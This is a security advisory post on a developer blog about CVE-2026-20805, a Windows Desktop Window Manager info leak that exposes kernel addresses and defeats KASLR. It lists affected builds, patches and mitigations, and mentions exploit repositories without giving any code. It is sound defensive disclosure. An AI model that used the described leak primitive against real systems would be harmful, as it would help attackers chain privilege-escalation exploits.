DEV Community

CVE Reports
CVE Reports

Posted on • Originally published at cvereports.com

CVE-2026-20805: Glass Houses: Shattering KASLR via Windows DWM (CVE-2026-20805)

#security #cve #cybersecurity

Glass Houses: Shattering KASLR via Windows DWM (CVE-2026-20805)

Vulnerability ID: CVE-2026-20805
CVSS Score: 5.5
Published: 2026-01-13

A seemingly benign information disclosure vulnerability in the Windows Desktop Window Manager (dwm.exe) serves as a critical KASLR bypass primitive. By querying system handle information, unprivileged local attackers can leak raw kernel virtual addresses associated with ALPC ports, effectively de-randomizing the kernel memory layout.

TL;DR

CVE-2026-20805 is a local info-leak in dwm.exe that reveals kernel memory addresses. While it doesn't execute code on its own, it allows attackers to bypass Kernel Address Space Layout Randomization (KASLR), a primary defense mechanism in Windows. It is currently listed in the CISA KEV catalog, meaning ransomware groups and APTs are actively chaining it with other exploits to achieve privilege escalation.

⚠️ Exploit Status: ACTIVE

Technical Details

  • CWE ID: CWE-200
  • Attack Vector: Local (AV:L)
  • CVSS Score: 5.5 (Medium)
  • EPSS Score: 5.86% (High Percentile)
  • Impact: Kernel Address Space Layout Randomization (KASLR) Bypass
  • Exploit Status: Active Exploitation (CISA KEV)

Affected Systems

  • Windows 10 Version 1607 through 22H2
  • Windows 11 Version 22H3 through 25H2
  • Windows Server 2012 / 2012 R2
  • Windows Server 2016 / 2019 / 2022
  • Windows Server 2025
  • Windows 10 1809: < 10.0.17763.8276 (Fixed in: 10.0.17763.8276)
  • Windows 11 23H2: < 10.0.22631.6491 (Fixed in: 10.0.22631.6491)
  • Windows Server 2025: < 10.0.26100.7623 (Fixed in: 10.0.26100.7623)

Exploit Details

  • GitHub: C++ implementation of NtQuerySystemInformation dumper targeting DWM
  • GitHub: Python-based memory leak monitor for ALPC structures

Mitigation Strategies

  • Apply Vendor Patches immediately (January 2026 Cumulative Updates).
  • Monitor specific Native API calls (NtQuerySystemInformation) for anomalous patterns.
  • Implement Attack Surface Reduction (ASR) rules to prevent initial code execution.

Remediation Steps:

  1. Identify vulnerable hosts using version numbering (e.g., Windows 10 < 10.0.17763.8276).
  2. Deploy the January 13, 2026 security update via WSUS, MECM, or Windows Update.
  3. Reboot the system to reload the ntoskrnl.exe and dwm.exe components.

References

Read the full report for CVE-2026-20805 on our website for more details including interactive diagrams and full exploit analysis.

Top comments (0)